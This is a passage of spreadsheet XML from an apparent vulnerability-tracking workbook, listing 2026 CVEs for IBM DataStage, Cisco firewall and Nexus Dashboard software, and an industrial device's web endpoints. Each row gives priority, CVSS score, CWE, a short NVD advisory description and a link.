        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16466</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16673</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr"/>
      <c r="Q142" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 IBM DataStage could allow a remote authenticated attacker to execute arbitrary OS commands due to improper neutralization of special characters in the PxPeek name property.</t>
        </is>
      </c>
      <c r="S142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16673</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20333</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr"/>
      <c r="Q143" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20333 are related to incorrect comparison conditions that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-697.</t>
        </is>
      </c>
      <c r="S143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20333</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20336</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr"/>
      <c r="Q144" s="5" t="inlineStr">
        <is>
          <t>CWE-664</t>
        </is>
      </c>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20336 are related to issues concerning improper control of a resource through its lifetime that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-664.</t>
        </is>
      </c>
      <c r="S144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20336</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20340</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr"/>
      <c r="Q145" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Secure FMC Software could allow an authenticated, remote attacker to execute arbitrary commands at the&amp;nbsp;root privilege level.
This vulnerability is due to unsecured deserialization of web-management user-controlled data. An attacker could exploit this vulnerability by authenticating to the device and sending a crafted HTTP payload. A successful exploit could allow the attacker to save the crafted payload and then execute it on the underlying operating system as root.
To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Security Analyst (read-only).</t>
        </is>
      </c>
      <c r="S145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20340</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20344</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr"/>
      <c r="Q146" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco Secure FMC Software could allow an authenticated, remote attacker to perform a SQL injection attack against an affected device. To exploit this vulnerability, the attacker must have a valid account on the device with the role of Security Approver, Access Admin, or Network Admin.
This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to obtain any data from the database, obtain the session credentials of an authenticated Administrator, and take actions with administrative privileges on the affected device.</t>
        </is>
      </c>
      <c r="S146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20344</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20360</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr"/>
      <c r="Q147" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20360 are related to information exposure and insecure handling issues that are grouped under the Common Weakness Enumeration (CWE) CWE-200.</t>
        </is>
      </c>
      <c r="S147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20360</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20361</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr"/>
      <c r="Q148" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20361 are related to SQL injection issues that are grouped under the Common Weakness Enumeration (CWE) CWE-89.</t>
        </is>
      </c>
      <c r="S148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20361</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27547</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr"/>
      <c r="Q149" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /index.php/ajax/get_iodd_menu_info endpoint using valid user or operator credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27547</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27548</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr"/>
      <c r="Q150" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /index.php/ajax/get_iodd_port_info endpoint using user or operator credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27548</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27549</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr"/>
      <c r="Q151" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /index.php/attached_devices_tab/do_upload endpoint using operator credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27549</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27550</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr"/>
      <c r="Q152" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the Field_Shadow_Password class using operator credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27550</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27551</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr"/>
      <c r="Q153" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /index.php/ajax/parameterManage endpoint using user credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27551</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27554</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr"/>
      <c r="Q154" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /index.php/ajax/save_iodd_parameters endpoint using operator credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27554</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27555</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr"/>
      <c r="Q155" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a local file inclusion vulnerability in the /index.php/ajax/get_iodd_port_info endpoint using a valid user cookie allowing execution of arbitrary PHP code on the device.</t>
        </is>
      </c>
      <c r="S155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27555</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27556</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr"/>
      <c r="Q156" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a local file inclusion vulnerability in the /index.php/ajax/save_iodd_parameters endpoint using a valid operator cookie allowing execution of arbitrary PHP code on the device.</t>
        </is>
      </c>
      <c r="S156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27556</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27558</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr"/>
      <c r="Q157" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /index.php/attached_devices_tab/ajax_remove_uploaded_iodd_files endpoint using operator credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27558</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27559</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr"/>
      <c r="Q158" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>A low-privileged remote attacker can exploit a command injection vulnerability in the /api/status/data endpoint by sending a crafted GET request with user credentials allowing execution of commands with root privileges on the device.</t>
        </is>
      </c>
      <c r="S158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27559</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
